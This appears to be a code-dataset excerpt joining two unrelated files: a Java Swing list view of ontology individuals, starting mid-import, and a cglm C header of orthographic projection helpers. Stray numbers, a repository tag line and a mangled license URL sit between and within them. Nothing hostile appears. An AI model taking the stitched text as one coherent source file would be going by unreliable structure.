javax.swing.event.ChangeListener; import javax.swing.event.ListSelectionEvent; import javax.swing.event.ListSelectionListener; import java.awt.*; import java.awt.event.ActionEvent; import java.awt.event.MouseAdapter; import java.awt.event.MouseEvent; import java.util.*; import java.util.List; /** * Author: <NAME><br> * The University Of Manchester<br> * Bio-Health Informatics Group<br> * Date: 29-Jan-2007<br> * <br> This definitely needs a rethink - it is a totally inefficient hack! 
*/
public class OWLIndividualListViewComponent extends AbstractOWLIndividualViewComponent
        implements Findable<OWLNamedIndividual>, Deleteable, CreateNewTarget, RefreshableComponent, SelectionDriver {

    // Swing list showing every named individual in the active ontologies.
    private OWLObjectList<OWLNamedIndividual> list;

    // Keeps individualsInList in sync with axiom additions/removals.
    private OWLOntologyChangeListener listener;

    private ChangeListenerMediator changeListenerMediator;

    // Refills the list when the active ontology changes or is reloaded.
    private OWLModelManagerListener modelManagerListener;

    // Guard used by reset(): programmatic selection changes must not be
    // propagated as global (user-driven) selections.
    private boolean selectionChangedByUser = true;

    // Sorted snapshot of the individuals currently displayed.
    protected Set<OWLNamedIndividual> individualsInList;

    private ListSelectionListener listSelectionListener = new ListSelectionListener() {
        public void valueChanged(ListSelectionEvent e) {
            if (!e.getValueIsAdjusting()) {
                // Only publish selection globally when it came from the user.
                if (list.getSelectedValue() != null && selectionChangedByUser) {
                    setGlobalSelection(list.getSelectedValue());
                }
                changeListenerMediator.fireStateChanged(OWLIndividualListViewComponent.this);
            }
        }
    };

    // Builds the UI, wires listeners and performs the initial fill.
    public void initialiseIndividualsView() throws Exception {
        list = new OWLObjectList<>(getOWLEditorKit());
        int selectionMode = ListSelectionModel.MULTIPLE_INTERVAL_SELECTION;
        list.setSelectionMode(selectionMode);
        setLayout(new BorderLayout());
        add(new JScrollPane(list));
        list.addListSelectionListener(listSelectionListener);
        list.addMouseListener(new MouseAdapter() {
            public void mouseReleased(MouseEvent e) {
                setGlobalSelection(list.getSelectedValue());
            }
        });
        listener = changes -> processChanges(changes);
        getOWLModelManager().addOntologyChangeListener(listener);
        setupActions();
        changeListenerMediator = new ChangeListenerMediator();
        individualsInList = new TreeSet<>(getOWLModelManager().getOWLObjectComparator());
        refill();
        modelManagerListener = event -> {
            if (event.isType(EventType.ACTIVE_ONTOLOGY_CHANGED) || event.isType(EventType.ONTOLOGY_RELOADED)) {
                refill();
            }
        };
        getOWLModelManager().addListener(modelManagerListener);
    }

    // Installs the toolbar actions for adding and deleting individuals.
    protected void setupActions() {
        addAction(new AddIndividualAction(), "A", "A");
        addAction(new DeleteIndividualAction(getOWLEditorKit(), () -> getSelectedIndividuals()), "B", "A");
    }

    public void refreshComponent() {
        refill();
    }

    // Rebuilds individualsInList from scratch from the active ontologies.
    protected void refill() {
        // Initial fill
        individualsInList.clear();
        for (OWLOntology ont : getOntologies()) {
            individualsInList.addAll(ont.getIndividualsInSignature());
        }
        reset();
    }

    protected Set<OWLOntology> getOntologies() {
        return getOWLModelManager().getActiveOntologies();
    }

    public void setSelectedIndividual(OWLIndividual individual) {
        list.setSelectedValue(individual, true);
    }

    // Pushes individualsInList into the JList, restoring the previous
    // selection without re-broadcasting it as a user selection.
    protected void reset() {
        OWLNamedIndividual[] objects = individualsInList.toArray(new OWLNamedIndividual[individualsInList.size()]);
        list.setListData(objects);
        OWLNamedIndividual individual = getSelectedOWLIndividual();
        selectionChangedByUser = false;
        try {
            list.setSelectedValue(individual, true);
        } finally {
            selectionChangedByUser = true;
        }
    }

    public OWLNamedIndividual updateView(OWLNamedIndividual selelectedIndividual) {
        if (!isPinned()) {
            list.setSelectedValue(selelectedIndividual, true);
        }
        return list.getSelectedValue();
    }

    public void disposeView() {
        getOWLModelManager().removeOntologyChangeListener(listener);
        getOWLModelManager().removeListener(modelManagerListener);
    }

    public OWLNamedIndividual getSelectedIndividual() {
        return list.getSelectedValue();
    }

    public Set<OWLNamedIndividual> getSelectedIndividuals() {
        return new LinkedHashSet<>(list.getSelectedValuesList());
    }

    // Incrementally applies ontology changes to the displayed set: entities
    // referenced by added axioms are added; entities from removed axioms are
    // dropped only when no active ontology still references them.
    protected void processChanges(List<? extends OWLOntologyChange> changes) {
        Set<OWLEntity> possiblyAddedObjects = new HashSet<>();
        Set<OWLEntity> possiblyRemovedObjects = new HashSet<>();
        OWLEntityCollector addedCollector = new OWLEntityCollector(possiblyAddedObjects);
        OWLEntityCollector removedCollector = new OWLEntityCollector(possiblyRemovedObjects);
        for (OWLOntologyChange chg : changes) {
            if (chg.isAxiomChange()) {
                OWLAxiomChange axChg = (OWLAxiomChange) chg;
                if (axChg instanceof AddAxiom) {
                    axChg.getAxiom().accept(addedCollector);
                }
                else {
                    axChg.getAxiom().accept(removedCollector);
                }
            }
        }
        // Only refresh the list widget when the underlying set changed.
        boolean mod = false;
        for (OWLEntity ent : possiblyAddedObjects) {
            if (ent instanceof OWLIndividual) {
                if (individualsInList.add((OWLNamedIndividual) ent)) {
                    mod = true;
                }
            }
        }
        for (OWLEntity ent : possiblyRemovedObjects) {
            if (ent instanceof OWLIndividual) {
                boolean stillReferenced = false;
                for (OWLOntology ont : getOntologies()) {
                    if (ont.containsIndividualInSignature(ent.getIRI())) {
                        stillReferenced = true;
                        break;
                    }
                }
                if (!stillReferenced) {
                    if (individualsInList.remove(ent)) {
                        mod = true;
                    }
                }
            }
        }
        if (mod) {
            reset();
        }
    }

    // Prompts for a new individual, applies the creation changes (plus any
    // subclass-provided extras) and selects the new entry.
    protected void addIndividual() {
        OWLEntityCreationSet<OWLNamedIndividual> set = getOWLWorkspace().createOWLIndividual();
        if (set == null) {
            return;
        }
        List<OWLOntologyChange> changes = new ArrayList<>();
        changes.addAll(set.getOntologyChanges());
        changes.addAll(dofurtherCreateSteps(set.getOWLEntity()));
        getOWLModelManager().applyChanges(changes);
        OWLNamedIndividual ind = set.getOWLEntity();
        if (ind != null) {
            list.setSelectedValue(ind, true);
        }
    }

    // Hook for subclasses to contribute extra changes when an individual is
    // created; the default contributes none.
    protected List<OWLOntologyChange> dofurtherCreateSteps(OWLIndividual newIndividual) {
        return Collections.emptyList();
    }

    public List<OWLNamedIndividual> find(String match) {
        return new ArrayList<>(getOWLModelManager().getOWLEntityFinder().getMatchingOWLIndividuals(match));
    }

    public void show(OWLNamedIndividual owlEntity) {
        list.setSelectedValue(owlEntity, true);
    }

    public void setSelectedIndividuals(Set<OWLNamedIndividual> individuals) {
        list.setSelectedValues(individuals, true);
    }

    private class AddIndividualAction extends DisposableAction {

        public AddIndividualAction() {
            super("Add individual", new AddEntityIcon(new OWLIndividualIcon()));
        }

        public void actionPerformed(ActionEvent e) {
            addIndividual();
        }

        public void dispose() {
        }
    }

    public void addChangeListener(ChangeListener listener) {
        changeListenerMediator.addChangeListener(listener);
    }

    public void removeChangeListener(ChangeListener listener) {
        changeListenerMediator.removeChangeListener(listener);
    }

    public void handleDelete() {
        OWLEntityDeleter.deleteEntities(getSelectedIndividuals(), getOWLModelManager());
    }

    public boolean canDelete() {
        return !getSelectedIndividuals().isEmpty();
    }

    public boolean canCreateNew() {
        return true;
    }

    public void createNewObject() {
        addIndividual();
    }

    public void setSelectionMode(int selectionMode) {
        if (list != null) {
            list.setSelectionMode(selectionMode);
        }
    }

    public void setIndividualListColor(Color c) {
        list.setBackground(c);
    }

    @Override
    public Component asComponent() {
        return this;
    }

    @Override
    public Optional<OWLObject> getSelection() {
        return Optional.ofNullable(getSelectedIndividual());
    }
}
4,036
1,417
<reponame>llsilva66/cglm<gh_stars>1000+ /* * Copyright (c), <NAME>. * * MIT License (MIT), htt../opensource.org/licenses/MIT * Full license can be found in the LICENSE file */ /* Functions: CGLM_INLINE mat4s glms_ortho_rh_zo(float left, float right, float bottom, float top, float nearZ, float farZ) CGLM_INLINE mat4s glms_ortho_aabb_rh_zo(vec3s box[2]); CGLM_INLINE mat4s glms_ortho_aabb_p_rh_zo(vec3s box[2], float padding); CGLM_INLINE mat4s glms_ortho_aabb_pz_rh_zo(vec3s box[2], float padding); CGLM_INLINE mat4s glms_ortho_default_rh_zo(float aspect) CGLM_INLINE mat4s glms_ortho_default_s_rh_zo(float aspect, float size) */ #ifndef cglms_ortho_rh_zo_h #define cglms_ortho_rh_zo_h #include "../../common.h" #include "../../types-struct.h" #include "../../plane.h" #include "../../cam.h" /*! * @brief set up orthographic projection matrix * with a right-hand coordinate system and a * clip-space of [0, 1]. * * @param[in] left viewport.left * @param[in] right viewport.right * @param[in] bottom viewport.bottom * @param[in] top viewport.top * @param[in] nearZ near clipping plane * @param[in] farZ far clipping plane * @returns result matrix */ CGLM_INLINE mat4s glms_ortho_rh_zo(float left, float right, float bottom, float top, float nearZ, float farZ) { mat4s dest; glm_ortho_rh_zo(left, right, bottom, top, nearZ, farZ, dest.raw); return dest; } /*! * @brief set up orthographic projection matrix using bounding box * with a right-hand coordinate system and a * clip-space of [0, 1]. * * bounding box (AABB) must be in view space * * @param[in] box AABB * @returns result matrix */ CGLM_INLINE mat4s glms_ortho_aabb_rh_zo(vec3s box[2]) { mat4s dest; vec3 rawBox[2]; glms_vec3_unpack(rawBox, box, 2); glm_ortho_aabb_rh_zo(rawBox, dest.raw); return dest; } /*! * @brief set up orthographic projection matrix using bounding box * with a right-hand coordinate system and a * clip-space of [0, 1]. 
* * bounding box (AABB) must be in view space * * @param[in] box AABB * @param[in] padding padding * @returns result matrix */ CGLM_INLINE mat4s glms_ortho_aabb_p_rh_zo(vec3s box[2], float padding) { mat4s dest; vec3 rawBox[2]; glms_vec3_unpack(rawBox, box, 2); glm_ortho_aabb_p_rh_zo(rawBox, padding, dest.raw); return dest; } /*! * @brief set up orthographic projection matrix using bounding box * with a right-hand coordinate system and a * clip-space of [0, 1]. * * bounding box (AABB) must be in view space * * @param[in] box AABB * @param[in] padding padding for near and far * @returns result matrix */ CGLM_INLINE mat4s glms_ortho_aabb_pz_rh_zo(vec3s box[2], float padding) { mat4s dest; vec3 rawBox[2]; glms_vec3_unpack(rawBox, box, 2); glm_ortho_aabb_pz_rh_zo(rawBox, padding, dest.raw); return dest; } /*! * @brief set up unit orthographic projection matrix * with a right-hand coordinate system and a * clip-space of [0, 1]. * * @param[in] aspect aspect ration ( width / height ) * @returns result matrix */ CGLM_INLINE mat4s glms_ortho_default_rh_zo(float aspect) { mat4s dest; glm_ortho_default_rh_zo(aspect, dest.raw); return dest; } /*! * @brief set up orthographic projection matrix with given CUBE size * with a right-hand coordinate system and a * clip-space of [0, 1]. * * @param[in] aspect aspect ratio ( width / height ) * @param[in] size cube size * @returns result matrix */ CGLM_INLINE mat4s glms_ortho_default_s_rh_zo(float aspect, float size) { mat4s dest; glm_ortho_default_s_rh_zo(aspect, size, dest.raw); return dest; } #endif /* cglms_ortho_rh_zo_h */
1,694